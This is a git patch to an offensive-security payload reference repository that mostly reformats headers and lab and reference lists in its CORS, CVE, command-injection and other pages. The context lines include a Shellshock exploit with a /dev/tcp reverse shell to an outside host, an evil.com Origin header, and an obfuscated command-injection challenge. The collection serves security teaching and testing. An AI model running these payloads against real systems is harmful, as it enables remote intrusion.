From d80f73a829c40ecedcc8bbf57f4961f9c8e460e5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 9 Nov 2024 23:01:39 +0100 Subject: [PATCH] Normalize page header for API, CSPT, CORS, CSRF --- API Key Leaks/IIS-Machine-Keys.md | 12 ++--- CORS Misconfiguration/README.md | 55 +++++++++++++---------- CRLF Injection/README.md | 2 +- CVE Exploits/README.md | 29 +++++++++++-- Clickjacking/README.md | 13 +++--- Client Side Path Traversal/README.md | 21 +++++---- Command Injection/README.md | 65 +++++++++++++++------------- SQL Injection/README.md | 2 +- _LEARNING_AND_SOCIALS/YOUTUBE.md | 1 + _template_vuln/README.md | 25 +++++++---- 10 files changed, 135 insertions(+), 90 deletions(-) diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md index 004be95..cad6573 100644 --- a/API Key Leaks/IIS-Machine-Keys.md +++ b/API Key Leaks/IIS-Machine-Keys.md @@ -16,12 +16,6 @@ * [References](#references) -**Requirements** - -* `__VIEWSTATE` -* `__VIEWSTATEGENERATOR`* - - ## Viewstate Format ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information. @@ -135,6 +129,12 @@ List of interesting machine keys to use: First you need to decode the Viewstate to know if the MAC and the encryption are enabled. +**Requirements** + +* `__VIEWSTATE` +* `__VIEWSTATEGENERATOR` + + ### MAC Is Not Enabled ```ps1 diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 0a09568..f805bc6 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -2,13 +2,21 @@ > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. + ## Summary * [Tools](#tools) -* [Prerequisites](#prerequisites) +* [Requirements](#requirements) * [Exploitation](#exploitation) + * [Origin Reflection](#origin-reflection) + * [Null Origin](#null-origin) + * [XSS on Trusted Origin](#xss-on-trusted-origin) + * [Wildcard Origin `*` without Credentials](#wildcard-origin--without-credentials) + * [Expanding the Origin](#expanding-the-origin) +* [Labs](#labs) * [References](#references) + ## Tools * [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) @@ -17,17 +25,19 @@ * [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors) * [omranisecurity/CorsOne - Fast CORS Misconfiguration Discovery Tool](https://github.com/omranisecurity/CorsOne) -## Prerequisites + +## Requirements * BURP HEADER> `Origin: https://evil.com` * VICTIM HEADER> `Access-Control-Allow-Credential: true` * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` + ## Exploitation Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. -### Vulnerable Example: Origin Reflection +### Origin Reflection #### Vulnerable Implementation @@ -87,7 +97,7 @@ or ``` -### Vulnerable Example: Null Origin +### Null Origin #### Vulnerable Implementation @@ -128,7 +138,7 @@ origin in the request: "> ``` -### Vulnerable Example: XSS on Trusted Origin +### XSS on Trusted Origin If the application does implement a strict whitelist of allowed origins, the exploit codes from above do not work. But if you have an XSS on a trusted @@ -139,7 +149,7 @@ again. https://trusted-origin.example.com/?xss= ``` -### Vulnerable Example: Wildcard Origin `*` without Credentials +### Wildcard Origin `*` without Credentials If the server responds with a wildcard origin `*`, **the browser does never send the cookies**. However, if the server does not require authentication, it's still @@ -178,7 +188,9 @@ function reqListener() { }; ``` -### Vulnerable Example: Expanding the Origin / Regex Issues + +### Expanding the Origin + Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. #### Vulnerable Implementation (Example 1) @@ -247,26 +259,25 @@ function reqListener() { }; ``` + ## Labs -* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) -* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) -* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) -* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) +* [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) +* [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) +* [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) +* [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) -## Bug Bounty reports - -* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) -* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) -* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) -* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) -* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) ## References -- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +- [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298) +- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) +- [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147) +- [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249) +- [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574) +- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) +- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) +- [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200) - [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) - [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) -- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) -- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) \ No newline at end of file +- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) \ No newline at end of file diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index b5a1d04..84b028e 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -112,7 +112,7 @@ Remainder: ## Labs -* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) +* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) ## References diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 1ea0374..34aef72 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -1,5 +1,21 @@ # Common Vulnerabilities and Exposures +A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems. + +## Summary + +* [Tools](#tools) +* [Big CVEs in the last 15 years](#big-cves-in-the-last-15-years) + * [CVE-2017-0144 - EternalBlue](#cve-2017-0144---eternalblue) + * [CVE-2017-5638 - Apache Struts 2](#cve-2017-5638---apache-struts-2) + * [CVE-2018-7600 - Drupalgeddon 2](#cve-2018-7600---drupalgeddon-2) + * [CVE-2019-0708 - BlueKeep](#cve-2019-0708---bluekeep) + * [CVE-2019-19781 - Citrix ADC Netscaler](#cve-2019-19781---citrix-adc-netscaler) + * [CVE-2014-0160 - Heartbleed](#cve-2014-0160---heartbleed) + * [CVE-2014-6271 - Shellshock](#cve-2014-6271---shellshock) +* [References](#references) + + ## Tools - [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve) @@ -8,7 +24,7 @@ - [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com) -## Big CVEs in the last 5 years. +## Big CVEs in the last 15 years ### CVE-2017-0144 - EternalBlue @@ -24,19 +40,23 @@ Afftected systems: - Windows 10 Gold, 1511, and 1607 - Windows Server 2016 + ### CVE-2017-5638 - Apache Struts 2 On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. + ### CVE-2018-7600 - Drupalgeddon 2 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. + ### CVE-2019-0708 - BlueKeep A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. -### CVE-2019-19781 - Citrix ADC Netscaler + +### CVE-2019-19781 - Citrix ADC Netscaler A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution. @@ -47,12 +67,12 @@ Affected products: - Citrix ADC and NetScaler Gateway version 11.1 all supported builds - Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds -## Older, but not forgotten ### CVE-2014-0160 - Heartbleed The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). + ### CVE-2014-6271 - Shellshock Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. @@ -62,7 +82,8 @@ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0 curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" ``` -## Thanks to + +## References * [Heartbleed - Official website](http://heartbleed.com) * [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug)) diff --git a/Clickjacking/README.md b/Clickjacking/README.md index c49e7ca..23a23e8 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -1,9 +1,6 @@ # Clickjacking -> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, -> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions -> as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions -> that a normal user can do on a legitimate website can be done using clickjacking. +> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking. ## Summary @@ -22,8 +19,8 @@ * [IE8 XSS filter](#ie8-xss-filter) * [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter) * [Challenge](#challenge) -* [Practice Environments](#practice-environments) -* [Reference](#references) +* [Labs](#labs) +* [References](#references) ## Tools @@ -229,10 +226,10 @@ Inspect the following code: Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website. -## Practice Environments +## Labs * [OWASP WebGoat](https://owasp.org/www-project-webgoat/) -* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking) +* [OWASP Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking) ## References diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md index 0bb598f..9580429 100644 --- a/Client Side Path Traversal/README.md +++ b/Client Side Path Traversal/README.md @@ -1,15 +1,18 @@ # Client Side Path Traversal -Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks. -It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches. -Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks. +> Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks. + +> It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches. + +> Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks. + ## Summary * [Tools](#tools) -* [Lab](#lab) * [CSPT to XSS](#cspt-to-xss) * [CSPT to CSRF](#cspt-to-xss) +* [Labs](#labs) * [References](#references) @@ -18,11 +21,6 @@ Since every request is initiated from within the frontend of the application, th * [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal. -## Lab - -* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT). - - ## CSPT to XSS ![](https://matanber.com/images/blog/cspt-query-param.png) @@ -61,6 +59,11 @@ Real-World Scenarios: * [CVE-2023-5123 : CSPT2CSRF in Grafana’s JSON API Plugin](https://medium.com/@maxime.escourbiac/grafana-cve-2023-5123-write-up-74e1be7ef652) +## Labs + +* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT). + + ## References - [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html) diff --git a/Command Injection/README.md b/Command Injection/README.md index 94b0267..1d965d6 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -2,40 +2,41 @@ > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. + ## Summary * [Tools](#tools) * [Exploits](#exploits) - * [Basic commands](#basic-commands) - * [Chaining commands](#chaining-commands) - * [Argument injection](#argument-injection) - * [Inside a command](#inside-a-command) + * [Basic commands](#basic-commands) + * [Chaining commands](#chaining-commands) + * [Argument injection](#argument-injection) + * [Inside a command](#inside-a-command) * [Filter Bypasses](#filter-bypasses) - * [Bypass without space](#bypass-without-space) - * [Bypass with a line return](#bypass-with-a-line-return) - * [Bypass with backslash newline](#bypass-with-backslash-newline) - * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) - * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) - * [Bypass with Brace expansion](#bypass-with-brace-expansion) - * [Bypass characters filter](#bypass-characters-filter) - * [Bypass blacklisted words](#bypass-blacklisted-words) - * [Bypass with single quote](#bypass-with-single-quote) - * [Bypass with double quote](#bypass-with-double-quote) - * [Bypass with backticks](#bypass-with-backticks) - * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) - * [Bypass with $@](#bypass-with-) - * [Bypass with $()](#bypass-with--1) - * [Bypass with variable expansion](#bypass-with-variable-expansion) - * [Bypass with wildcards](#bypass-with-wildcards) + * [Bypass without space](#bypass-without-space) + * [Bypass with a line return](#bypass-with-a-line-return) + * [Bypass with backslash newline](#bypass-with-backslash-newline) + * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) + * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) + * [Bypass with Brace expansion](#bypass-with-brace-expansion) + * [Bypass characters filter](#bypass-characters-filter) + * [Bypass blacklisted words](#bypass-blacklisted-words) + * [Bypass with single quote](#bypass-with-single-quote) + * [Bypass with double quote](#bypass-with-double-quote) + * [Bypass with backticks](#bypass-with-backticks) + * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) + * [Bypass with $@](#bypass-with-) + * [Bypass with $()](#bypass-with--1) + * [Bypass with variable expansion](#bypass-with-variable-expansion) + * [Bypass with wildcards](#bypass-with-wildcards) * [Data Exfiltration](#data-exfiltration) - * [Time based data exfiltration](#time-based-data-exfiltration) - * [DNS based data exfiltration](#dns-based-data-exfiltration) + * [Time based data exfiltration](#time-based-data-exfiltration) + * [DNS based data exfiltration](#dns-based-data-exfiltration) * [Polyglot Command Injection](#polyglot-command-injection) * [Tricks](#tricks) - * [Backgrounding long running commands](#backgrounding-long-running-commands) - * [Remove arguments after the injection](#remove-arguments-after-the-injection) + * [Backgrounding long running commands](#backgrounding-long-running-commands) + * [Remove arguments after the injection](#remove-arguments-after-the-injection) * [Labs](#labs) -* [Challenge](#challenge) + * [Challenge](#challenge) * [References](#references) @@ -417,14 +418,14 @@ In Unix-like command-line interfaces, the `--` symbol is used to signify the end ## Labs -* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) -* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) -* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) -* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) -* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) +* [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) +* [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) +* [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) +* [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) +* [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) -## Challenge +### Challenge Challenge based on the previous tricks, what does the following command do: @@ -432,6 +433,8 @@ Challenge based on the previous tricks, what does the following command do: g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} ``` +**NOTE**: The command is safe to run, but you should not trust me. + ## References diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 7902125..422d78e 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -20,7 +20,7 @@ Attempting to manipulate SQL queries may have goals including: * [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) -* [SQLmap Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md) + * [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [Authentication bypass](#authentication-bypass) diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md index 6a15bc7..7ed2611 100644 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md @@ -27,6 +27,7 @@ - [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg) - [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU) + ## Conferences - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4) diff --git a/_template_vuln/README.md b/_template_vuln/README.md index 4d8a504..ea2ab7f 100644 --- a/_template_vuln/README.md +++ b/_template_vuln/README.md @@ -5,18 +5,20 @@ ## Summary * [Tools](#tools) -* [Something](#something) - * [Subentry 1](#subentry-1) - * [Subentry 2](#subentry-2) +* [Methodology](#methodology) + * [Subentry 1](#subentry-1) + * [Subentry 2](#subentry-2) +* [Labs](#labs) +* [References](#references) ## Tools -- [Tool 1](https://example.com) -- [Tool 2](https://example.com) +- [username/tool1](https://github.com/username/tool1) - Description of the tool +- [username/tool2](https://github.com/username/tool2) - Description of the tool -## Something +## Methodology Quick explanation @@ -24,13 +26,20 @@ Quick explanation Exploit ``` - ### Subentry 1 ### Subentry 2 +## Labs + +- [Company - Lab 1](#link-to-the-lab) +- [Company - Lab 2](#link-to-the-lab) +- [Company - Challenge 1](#link-to-the-challenge) +- [Company - Challenge 2](#link-to-the-challenge) + + ## References -- [Blog title - Author, Date](https://example.com) \ No newline at end of file +- [Blog title - Author (@handle) - Month XX, 202X](https://example.com) \ No newline at end of file